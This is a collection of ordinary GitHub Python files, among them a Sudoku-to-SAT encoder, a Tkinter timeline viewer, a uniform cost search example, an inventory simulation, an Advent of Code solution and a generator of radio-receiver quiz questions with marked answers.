gsat:\r\n string += \"( \" + '-' + str(base9To10(3*a+u,3*b+v,k)) + \" -\" + str(base9To10(3*a+w,3*b+t,k)) + \" )\\n\"\r\n else:\r\n string += '-' + str(base9To10(3*a+u,3*b+v,k)) + \" -\" + str(base9To10(3*a+w,3*b+t,k)) + \" 0\\n\"\r\n n += 1\r\n return string\r\n\r\n# Extended Encoding\r\n\r\ndef cellMostOnce():\r\n global n, gsat\r\n string = \"\"\r\n for x in range(9):\r\n for y in range(9):\r\n for z in range(8):\r\n for i in range(z+1, 9):\r\n if gsat:\r\n string += \"( \" + \"-\" + str(base9To10(x,y,z))\r\n string += \" -\" + str(base9To10(x,y,i)) + \" )\\n\"\r\n else:\r\n string += \"-\" + str(base9To10(x,y,z))\r\n string += \" -\" + str(base9To10(x,y,i)) + \" 0\\n\"\r\n n+=1\r\n return string\r\n\r\ndef rowLeastOnce():\r\n global n, gsat\r\n string = \"\"\r\n for y in range(9):\r\n for z in range(9):\r\n if gsat:\r\n string += \"( \"\r\n for x in range(9):\r\n string+= str(base9To10(x,y,z)) + \" \"\r\n if gsat:\r\n string += \")\\n\"\r\n else:\r\n string += \"0\\n\"\r\n n+=1\r\n return string\r\n\r\ndef colLeastOnce():\r\n global n, gsat\r\n string = \"\"\r\n for x in range(9):\r\n for z in range(9):\r\n if gsat:\r\n string += \"( \"\r\n for y in range(9):\r\n string+= str(base9To10(x,y,z)) + \" \"\r\n if gsat:\r\n string += \")\\n\"\r\n else:\r\n string += \"0\\n\"\r\n n+=1\r\n return string\r\n\r\n\r\ndef subGridLeastOnce():\r\n global n, gsat\r\n string = \"\"\r\n for z in range(9):\r\n for i in range(3):\r\n for j in range(3):\r\n if gsat:\r\n string += \"( \"\r\n for x in range(3):\r\n for y in range(3):\r\n string += str(base9To10(3*i+x,3*j+y,z)) + \" \"\r\n if gsat:\r\n string += \")\\n\"\r\n else:\r\n string += \"0\\n\"\r\n n+=1\r\n return string\r\n\r\n\r\ndef main():\r\n global gsat\r\n \r\n if len(sys.argv) < 2:\r\n print(\"Provide an input file\")\r\n sys.exit(-1)\r\n\r\n if (len(sys.argv) >= 3 and sys.argv[2] == \"-gsat\") or (len(sys.argv) >= 4 and sys.argv[3] == \"-gsat\"):\r\n gsat = 1;\r\n\r\n puzzle = parsePuzzle(sys.argv[1])\r\n\r\n dimacs_string = genInitialVars(puzzle) + genCellVars() + genRowVars() + genColVars() + genSubGridVars()\r\n\r\n if len(sys.argv) >= 3 and sys.argv[2] == \"-extended\":\r\n dimacs_string += cellMostOnce()\r\n dimacs_string += rowLeastOnce()\r\n dimacs_string += colLeastOnce()\r\n dimacs_string += subGridLeastOnce()\r\n\r\n if gsat:\r\n print(dimacs_string)\r\n else:\r\n print(\"p cnf 729 \" + str(n) + \"\\n\" + dimacs_string)\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"A3P/Sudoku","sub_path":"sud2sat.py","file_name":"sud2sat.py","file_ext":"py","file_size_in_byte":6838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"45935947688","text":"import unittest\nfrom chino.frozen_dict import FrozenDict\n\n\nclass TestFrozenDict(unittest.TestCase):\n\n def test_setattr(self):\n fd = FrozenDict()\n fd.SVM.C = 100.\n fd.SVM.IMPL = 'lbfgs'\n fd.NAME = 'frozen_dict'\n self.assertTrue(hasattr(fd, 'NAME'))\n self.assertTrue(hasattr(fd, 'SVM'))\n self.assertIsInstance(fd.SVM, FrozenDict)\n self.assertEqual(fd.SVM.C, 100.)\n self.assertEqual(fd.SVM.IMPL, 'lbfgs')\n\n def test_freeze(self):\n fd = FrozenDict()\n fd.SVM.C = 100.\n fd.SVM.IMPL = 'lbfgs'\n fd.freeze()\n self.assertTrue(fd.is_frozen())\n with self.assertRaises(AttributeError):\n _ = fd.NAME\n with self.assertRaises(KeyError):\n fd.NAME = 'oooops'\n with self.assertRaises(KeyError):\n fd.SVM = 'Not SVM Options at all'\n\n\nif __name__ == \"__main__\":\n 
unittest.main()\n","repo_name":"demonzyj56/chino","sub_path":"tests/test_frozen_dict.py","file_name":"test_frozen_dict.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1138855745","text":"# monitor.py\n# Th 11 Oct 2018\n# Antoine Choffrut\n#\n# Code for the class 'Monitor', which has as subclasses the classes 'Sketch' and 'Timeline'\n# previously coded as separate classes.\n# - The class 'Sketch' allows to visualize selected graphics using Tkinter\n# (hence quicker than drawing then saving the image files).\n# - The class 'Timeline' visualizes the timeline of selected graphics, also using Tkinter.\n\n\nfrom constants import *\nimport Tkinter\nimport inspect\nfrom primitive import Primitive, filter_by_class, current_variables\nfrom curve import Curve\nfrom helpers import *\nfrom geometry import *\nfrom graphic import Graphic\nfrom container import get_subelements_by_class, Compound, Block\n\ndef show_and_wait(root):\n root.lift()\n root.attributes('-topmost', True)\n root.after_idle(root.attributes,'-topmost',False)\n\nclass Monitor(object):\n def initialize_canvas(self):\n canvas = Tkinter.Canvas(self.root, width = self.w, height = self.h)\n canvas.pack()\n canvas.create_rectangle(0, 0, self.w, self.h, fill = self.bgcolor)\n return canvas\n\n def resize(self, ratio):\n self.ratio = ratio\n\n def display(self):\n pass\n \n def refresh(self):\n self.canvas.delete('all')\n self.canvas.create_rectangle(0, 0, self.w, self.h, fill = self.bgcolor)\n self.display()\n show_and_wait(self.root)\n\n def report(self, indent = '', **kwargs):\n w = 10\n indent = indent\n frame_locals = inspect.currentframe().f_back.f_locals\n\n graphics = filter_by_class(frame_locals, Graphic, option = 'inclusive')\n \n\n print(indent),\n print(\"\\bid: %s\"%id(self))\n\n print(indent + ' '*2),\n print(str('{0:<' + str(w) + '}').format('name') + ':'),\n print(' '*2),\n print('{0:<14}'.format(find_name(self, frame_locals)))\n\n print(indent + ' '*2),\n print(str('{0:<' + str(w) + '}').format('class') + ':'),\n print(' '*2),\n print('{0:<14}'.format(self.main_class_name()))\n\n print(indent + ' '*2),\n print(str('{0:<' + str(w) + '}').format('canvas') + ':'),\n print(' '*2),\n print('{0:<14}'.format(self.canvas))\n\n print(indent + ' '*2),\n print(str('{0:<' + str(w) + '}').format('ratio') + ':'),\n print(' '*2),\n print('{0:<14}'.format(self.ratio))\n\n print(indent + ' '*2),\n print(str('{0:<' + str(w) + '}').format('width') + ':'),\n print(' '*2),\n print('{0:<14}'.format(str(int(self.w))))\n\n print(indent + ' '*2),\n print(str('{0:<' + str(w) + '}').format('height') + ':'),\n print(' '*2),\n print('{0:<14}'.format(str(int(self.h))))\n\n if self.graphics == []:\n print(indent + ' '*2),\n print(str('{0:<' + str(w) + '}').format('no graphics'))\n return\n elif len(self.graphics) == 1:\n print(indent + ' '*2),\n print(str('{0:<' + str(w) + '}').format('1 graphic') + ':'),\n else:\n print(indent + ' '*2),\n print(str('{0:<' + str(w) + '}').format(str(len(self.graphics)) + ' graphics') + ':'),\n graphic = self.graphics[0]\n print(' '*3 + '+ '),\n print(\"\\bid: %s\"%id(graphic)),\n print(' '*2),\n print('{0:<14}'.format('(' + find_name(graphic, graphics) + ')'))\n \n for graphic in self.graphics[1:]:\n print(indent + ' '*(w+8) + '+ '),\n print(\"\\bid: %s\"%id(graphic)),\n print(' '*2),\n print('{0:<14}'.format('(' + find_name(graphic, graphics) + ')'))\n \n def add_graphics(self, *graphics):\n self.graphics = 
list(set(self.graphics + list(graphics)))\n\n\n def remove_graphics(self, *graphics):\n if 'all' in graphics:\n self.graphics = []\n return\n for graphic in graphics:\n if graphic in self.graphics:\n self.graphics.remove(graphic)\n\n\nclass Timeline(Monitor):\n def __init__(self, root, *args):\n self.bgcolor = 'linen'\n self.ratio = 1\n self.root = root\n self.root.title = 'Timeline'\n self.w = self.ratio*self.root.winfo_screenwidth()\n self.h = 0.5*self.ratio*self.root.winfo_screenheight()\n self.canvas = self.initialize_canvas()\n self.graphics = list(set([arg for arg in args if isinstance(arg, Graphic)]))\n self.root.geometry(\\\n str(int(self.w)) + 'x' + str(int(self.h)) \\\n + '+0+' + str(int(0.5*self.root.winfo_screenheight())))\n \n def main_class_name(self):\n return 'Timeline'\n\n def chrono_order(self):\n begin_times = [graphic.epochs['begin time'] for graphic in self.graphics]\n return list(np.argsort(begin_times))\n\n def all_times(self):\n if self.graphics == []:\n print(\"WARNING (method 'all_times' of class 'Timeline').\"),\n print(\"No graphics selected.\")\n curves = get_subelements_by_class(self.graphics, [], Curve)\n result = [float(epoch)\n for graphic in self.graphics\n for epoch in graphic.epochs.values()]\\\n + [float(epoch)\n for curve in curves\n for effect in curve.effects for epoch in effect.epochs.values()]\n return sorted(list(set(result)))\n \n def display(self):\n frame_locals = inspect.currentframe().f_back.f_locals\n prim_names = {frame_locals[key]: key\n for key in frame_locals\n if isinstance(frame_locals[key], Primitive)}\n self.canvas.create_text(\\\n (0.5*self.w, 0.95*self.h),\n text = \"TIMELINE (in seconds)\",\n fill = 'black',\n anchor = 's')\n if self.graphics == []:\n print(\"WARNING (method 'display' of class 'Timeline').\"),\n print(\"No graphics selected.\")\n return\n TW, TH = 0.75*self.w, 0.6*self.h\n X1, X2, Y = 0.5*(self.w-TW), 0.5*(self.w+TW), (self.h + TH)/2\n xy = (X1, Y, X2, Y)\n self.canvas.create_line(xy, fill = 'black')\n all_times = self.all_times()\n begin_time, end_time = all_times[0], all_times[-1]\n\n #\n d = self.h/120\n #\n self.canvas.create_text(\\\n translate((X1, Y), (-d, 0)),\n text = '{:.1f}'.format(all_times[0]/SECONDS),\n fill = 'black',\n anchor = 'e')\n self.canvas.create_text(\\\n translate((X2, Y), (d, 0)),\n text = '{:.1f}'.format(all_times[-1]/SECONDS),\n fill = 'black',\n anchor = 'w')\n for time in all_times[1:-1]:\n x = X1 + (time - begin_time)/float(end_time - begin_time)*(X2 - X1)\n y = Y\n xy = translate((0, d, 0, -d), (x, y))\n self.canvas.create_line(xy, fill = 'black', width = 3)\n self.canvas.create_text(\\\n translate((x, y), (0, d)),\n text = '{:.1f}'.format(time/SECONDS),\n fill = 'black',\n anchor = 'n')\n \n\n for i in range(len(self.graphics)):\n graphic = self.graphics[self.chrono_order()[i]]\n M = 12\n dy = - (i % M +1)/float(M)*TH\n #\n if isinstance(graphic, Curve):\n effects = graphic.effects\n elif isinstance(graphic, Block):\n effects = [effect\n for element in graphic.elements if isinstance(element, Curve)\n for effect in element.effects]\n else:\n effects = []\n #\n for effect in effects:\n x = X1 + (effect.epochs['begin time'] - begin_time) / \\\n float(end_time - begin_time)*(X2 - X1)\n y = Y + dy\n dx = (effect.epochs['end time'] - effect.epochs['begin time']) / \\\n float(end_time - begin_time)*(X2-X1)\n xy = (x, y, x + dx, y)\n self.canvas.create_line(xy, fill = 'red', width = 4)\n xy = translate((0, d, 0, -d), (x, y))\n self.canvas.create_line(xy, fill = 'red', width = 3)\n xy = (x 
+ (effect.epochs['end time'] - effect.epochs['begin time']) / \\\n float(end_time - begin_time)*(X2-X1), y)\n xy = translate((0, d, 0, -d), xy)\n self.canvas.create_line(xy, fill = 'red', width = 3)\n self.canvas.create_line((x, y, x, Y), fill = 'red', width = 1, dash = (4, 6))\n self.canvas.create_line((x + dx, y, x + dx, Y), fill = 'red', width = 1, dash = (4, 6))\n\n #\n x = X1 + (graphic.epochs['begin time'] - begin_time) / \\\n float(end_time - begin_time)*(X2 - X1)\n y = Y + dy\n dx = (graphic.epochs['end time'] - graphic.epochs['begin time']) / \\\n float(end_time - begin_time)*(X2-X1)\n\n\n text = graphic.name\n self.canvas.create_text(\\\n translate((x, y), (-d, 0)),\n text = text,\n fill = 'blue',\n anchor = 'e')\n\n xy = (x, y, x + dx, y)\n self.canvas.create_line(xy, fill = 'blue', width = 1)\n\n xy = translate((0, d, 0, -d), (x, y))\n self.canvas.create_line(xy, fill = 'blue', width = 3)\n\n xy = translate((0, d, 0, -d), (x + dx, y))\n self.canvas.create_line(xy, fill = 'blue', width = 3)\n\n self.canvas.create_line((x, y, x, Y), fill = 'blue', width = 1, dash = (4, 6))\n self.canvas.create_line((x + dx, y, x + dx, Y), fill = 'blue', width = 1, dash = (4, 6))\n\n \n show_and_wait(self.root)\n\n\nclass Sketch(Monitor):\n def __init__(self, root, *args):\n\n self.bgcolor = 'black'\n self.ratio = 0.5\n self.root = root\n self.root.title = 'Sketch'\n self.w = self.ratio*self.root.winfo_screenwidth()\n self.h = self.w*H/float(W)\n self.canvas = self.initialize_canvas()\n self.graphics = list(set([arg for arg in args]))\n self.root.geometry(str(int(self.w)) + 'x' + str(int(self.h)) + '+0+0')\n\n \n def main_class_name(self):\n return 'Sketch'\n\n def display(self):\n for graphic in self.graphics:\n graphic.sketch(self.root, self.canvas, self.ratio)\n show_and_wait(self.root)\n\n \nif __name__ == '__main__':\n from primitive import Primitive\n from curve import Rectangle\n from effect import Fade\n \n #rootsketch = Tkinter.Tk()\n #sketch = Sketch(rootsketch)\n roottimeline = Tkinter.Tk()\n timeline = Timeline(roottimeline)\n\n\n\n rect0 = Rectangle(anchor = ORIGIN, width = 0.25*W, height = 0.25*H)\n rect1 = Rectangle(anchor = ORIGIN, width = 0.25*W, height = 0.25*H)\n rect1.set_times((-1*SECONDS, 5*SECONDS))\n effectA = Fade()\n rect1.add_effects(effectA)\n effectA.set_duration(2*SECONDS)\n \n rect1.move_to(CENTER)\n\n #sketch.add_graphics(rect0, rect1)\n #sketch.display()\n\n timeline.add_graphics(rect0, rect1)\n timeline.report()\n timeline.display()\n\n\n #rootsketch.mainloop()\n roottimeline.mainloop()\n","repo_name":"antoinechoffrut/dynamicslides","sub_path":"monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":11640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33861403871","text":"# Priority Queue implementation for UCS\nclass PriorityQueue:\n def __init__(self):\n self.elements = []\n\n def enqueue(self, element):\n self.elements.append(element)\n self.elements.sort(key=lambda x: x[\"cost\"])\n\n def dequeue(self):\n return self.elements.pop(0)\n\n def is_empty(self):\n return len(self.elements) == 0\n\n\n# Function to perform Uniform Cost Search in a tree\ndef uniform_cost_search(tree, goal_node):\n # Priority queue to keep track of nodes and their cumulative costs\n priority_queue = PriorityQueue()\n\n # Initialize the priority queue with the root node and its cost (0)\n priority_queue.enqueue({\"node\": tree, \"path\": [], \"cost\": 0})\n\n while not priority_queue.is_empty():\n current = 
priority_queue.dequeue()\n        node, path, cost = current[\"node\"], current[\"path\"], current[\"cost\"]\n\n        if node[\"value\"] == goal_node:\n            # Goal node found, return the cumulative cost and path\n            return {\"cost\": cost, \"path\": path + [node[\"value\"]]}\n\n        for child in node[\"children\"]:\n            cost_to_child = child[\"cost\"]\n            total_cost = cost + cost_to_child\n            priority_queue.enqueue(\n                {\n                    \"node\": child,\n                    \"path\": path + [node[\"value\"]],\n                    \"cost\": total_cost,\n                }\n            )\n\n    return None  # Goal not reachable\n\n\n# Example tree representation for testing\ntree = {\n    \"value\": \"A\",\n    \"cost\": 0,\n    \"children\": [\n        {\n            \"value\": \"B\",\n            \"cost\": 3,\n            \"children\": [\n                {\n                    \"value\": \"D\",\n                    \"cost\": 6,\n                    \"children\": [],\n                },\n            ],\n        },\n        {\n            \"value\": \"C\",\n            \"cost\": 5,\n            \"children\": [\n                {\n                    \"value\": \"E\",\n                    \"cost\": 2,\n                    \"children\": [],\n                },\n                {\n                    \"value\": \"F\",\n                    \"cost\": 4,\n                    \"children\": [],\n                },\n            ],\n        },\n    ],\n}\n\n# Test the algorithm\ngoal_node = \"D\"\nresult = uniform_cost_search(tree, goal_node)\n\nif result is not None:\n    print(\"Shortest Path:\", \" -> \".join(result[\"path\"]))\n    print(\"Total Cost:\", result[\"cost\"])\nelse:\n    print(\"Goal not reachable.\")\n","repo_name":"iamashruu/Artificial_Intelligence_Lab","sub_path":"python/uniformCostSearch(ucs).py","file_name":"uniformCostSearch(ucs).py","file_ext":"py","file_size_in_byte":2411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"38872335953","text":"import numpy as np \nimport random as rnd \n\n\n\ndef demand():\n \n random_digit = rnd.randint(1, 100)\n daily_demand = 0\n \n\n if ( random_digit >= 1 and random_digit <= 10 ):\n daily_demand = 0\n elif ( random_digit >= 11 and random_digit <= 35 ):\n daily_demand = 1\n elif ( random_digit >= 36 and random_digit <= 70 ):\n daily_demand = 2\n elif ( random_digit >= 71 and random_digit <= 91 ):\n daily_demand = 3\n else:\n daily_demand = 4\n \n return [daily_demand, random_digit]\n \n\ndef lead_time():\n random_lead = rnd.randint(0, 9)\n\n if (random_lead >= 1 and random_lead <= 6):\n lead = 1\n elif (random_lead >= 7 and random_lead <= 9):\n lead = 2\n else:\n lead = 3\n \n return [lead, random_lead]\n\ndef orders(m, end_inv):\n order_unit = m - end_inv\n return order_unit\n\ndef main():\n\n #n = 5\n #m = 11\n #inventory = 3\n #order_unit = 8\n #order_arrives = 1\n\n n,m,inventory,order_unit,order_arrives = input(\"Enter N, M, Beginning_Inventory, Order_Unit, Order_Arrival Sequentially with comma: \").split(',')\n n = int(n)\n m = int(m)\n inventory = int(inventory)\n order_unit = int(order_unit)\n order_arrives = int(order_arrives)\n\n ending_inventory = []\n shortage_quantity = []\n\n print( \"Cycle\", \"Days\", \"Beg'n_Inventory\", \"Rand_Demand\", \"Demand\", \"End_Inventory\", \"Shortage\", \"Order_number\", \"Rand_Lead\", \"Order_Arrives\" )\n\n for i in range(1, n+1):\n lead = lead_time()\n \n for j in range(1, n+1):\n \n temp_order = order_arrives\n if temp_order == -1:\n temp_order = '_'\n\n \n\n if order_arrives == -1: # check whether the order has arrived; if it has, add the order amount back into the inventory\n inventory = inventory + order_unit - (shortage_quantity[-1] if shortage_quantity[-1] != '_' else 0)\n order_arrives = '_'\n else:\n if order_arrives != '_':\n order_arrives = order_arrives - 1\n \n \n \n \n demands = demand()\n\n\n\n if (inventory-demands[0]) >= 0:\n shortage_quantity.append('_')\n ending_inventory.append(inventory-demands[0])\n else:\n temp_val = 
demands[0] - inventory\n shortage_quantity.append(temp_val)\n ending_inventory.append(0)\n \n \n \n \n \n \n print(\" {}\\t{}\\t {}\\t\\t{}\\t{}\\t{}\\t\\t{}\\t{}\\t {}\\t\\t {}\".format(i if j==1 else ' ', j, inventory, demands[1], demands[0], ending_inventory[-1], shortage_quantity[-1], orders(m, ending_inventory[-1]) if j==n else '_', lead[1] if j==n else '_', temp_order) )\n #print('\\n')\n inventory = ending_inventory[-1]\n \n #order_unit = m - ending_inventory[-1]\n order_arrives = lead[0]\n print('\\n')\n\n\n print(\"Average Number of Ending Inventory: {}\".format( (sum(ending_inventory)/len(ending_inventory)) ) )\n\n \n print(\"Average Number of Shortage in Days: {}\".format( sum( i!='_' for i in shortage_quantity )/(n*n) ) )\n \n \n\n\n \n\n \n\n\nif __name__ == \"__main__\":\n main()\n\n\n\n","repo_name":"tonmoy50/uiu","sub_path":"Simultion Lab/inventory_management.py","file_name":"inventory_management.py","file_ext":"py","file_size_in_byte":3310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35628045224","text":"from collections import defaultdict\nimport time\n\n\ntime_start = time.time()\n[crates, moves] = open('input.txt', 'r').read().split('\\n\\n')\n\nlines = crates.split('\\n')[:-1]\nprint(crates)\n\nstacks = defaultdict(lambda: [])\n\nfor i, line in enumerate(lines):\n n = 0\n stack_counter = 1\n while n < len(line):\n if line[n] == '[':\n stacks[stack_counter].append(line[n+1])\n n += 4\n stack_counter += 1\n \nfor move in moves.split('\\n'):\n [_, count, _, move_from, _, move_to] = move.split()\n count, move_from, move_to = int(count), int(move_from), int(move_to)\n crane_stack = []\n for i in range(count):\n crate = stacks[move_from].pop(0)\n crane_stack.append(crate)\n stacks[move_to] = crane_stack + stacks[move_to]\n\n\n\nfinal_string = ''\nfor i in range(1, len(stacks)+1):\n final_string += stacks[i][0]\n\ntime_end = time.time()\n\nresult = final_string\nprint(f'I took this much: {time_end-time_start}s')\nprint(\"Result: {}\".format(result))\n","repo_name":"kibartas/AOC","sub_path":"kibartas/2022/05/wip.py","file_name":"wip.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5879370288","text":"import random\n\nclass ece_radio_receivers_section_1_1():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'its resistance value'\n\t\tchoice_b = 'its operating temperature #'\n\t\tchoice_c = 'both its resistance and operating temperature'\n\t\tchoice_d = 'none of the choices'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"The noise generated by a resistor depends upon\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_2():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'the IF stage has better selectivity than the RF stage #'\n\t\tchoice_b = 'the RF stage has better selectivity than the IF stage'\n\t\tchoice_c = 'the RF and IF stages have the same selectivity'\n\t\tchoice_d = 'none of the choices'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In a superheterodyne receiver \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. 
{choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_3():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'rectify the input signal'\n\t\tchoice_b = 'discard the carrier'\n\t\tchoice_c = 'provide audio signal'\n\t\tchoice_d = 'all of the choices #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"The function of an AM detector circuit is to\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_4():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'variable selectivity'\n\t\tchoice_b = 'variable sensitivity #'\n\t\tchoice_c = 'double conversion'\n\t\tchoice_d = 'squelch'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Which of the following should be used in order to prevent overloading of the last IF amplifier in a receiver?\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_5():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '433 kHz'\n\t\tchoice_b = '455 kHz #'\n\t\tchoice_c = '545 kHz'\n\t\tchoice_d = '555 kHz'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Most popular IF for receivers tuning from 540 to 1650 kHz is \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_6():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'the local oscillator operates below the signal frequency'\n\t\tchoice_b = 'local oscillator frequency is normally double the IF'\n\t\tchoice_c = 'RF amplifier normally works at frequencies above the carrier frequency'\n\t\tchoice_d = 'mixer input must be tuned to the signal frequency #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In a broadcast superheterodyne receiver\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_7():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'feed more than one receiver from a single antenna'\n\t\tchoice_b = 'connect two transmitters to the same antenna'\n\t\tchoice_c = 'connect a receiver and a transmitter to the same antenna #'\n\t\tchoice_d = 'none of the choices'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"A duplexer is a device used to \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_8():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'modulator'\n\t\tchoice_b = 'mixer #'\n\t\tchoice_c = 'demodulator'\n\t\tchoice_d = 'frequency translator'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"A heterodyne frequency changer is called a\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. 
{choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_9():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'improved image frequency rejection'\n\t\tchoice_b = 'improved rejection of adjacent unwanted signals'\n\t\tchoice_c = 'prevention of re-radiation of the local oscillator through the antenna of the receiver'\n\t\tchoice_d = 'all of the choices #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"RF amplifiers are used in radio receivers for\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_10():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'higher at low frequencies and lower at high frequencies'\n\t\tchoice_b = 'low at high and low frequencies and max at the midrange frequencies'\n\t\tchoice_c = 'relatively uniform at all frequencies #'\n\t\tchoice_d = 'low at lower frequencies and higher at higher frequencies'\t\t\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"The sensitivity curve of a standard receiver is\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_11():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '30, 60 and, 70 kHz'\n\t\tchoice_b = '3, 6, and 7 kHz'\n\t\tchoice_c = '30, 60, and 70 MHz #'\n\t\tchoice_d = '3, 6, and 7 GHz'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Which are the popular IF frequencies for microwave and radar receivers operating on frequencies in the range 1 to 10 GHz?\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_12():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'the linearity is worse than in a phase discriminator #'\n\t\tchoice_b = 'the output is twice that obtainable from a similar phase discriminator'\n\t\tchoice_c = 'stabilization against signal strength variations is provided'\n\t\tchoice_d = 'the circuit is the same as in a discriminator, except that the diodes are reversed'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In a ratio detector\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_13():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'stop oscillation #'\n\t\tchoice_b = 'increase bandwidth'\n\t\tchoice_c = 'improve selectivity'\n\t\tchoice_d = 'all of the choices'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Neutralization is used in RF amplifiers to \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_14():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'fs - 2 fi'\n\t\tchoice_b = 'fs + 2 fi #'\n\t\tchoice_c = '(fs + fi) / 2'\n\t\tchoice_d = '(fs - fi) / 2'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"If the signal frequency is (fs) and the intermediate frequency is (fi), the image frequency is given by\t\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. 
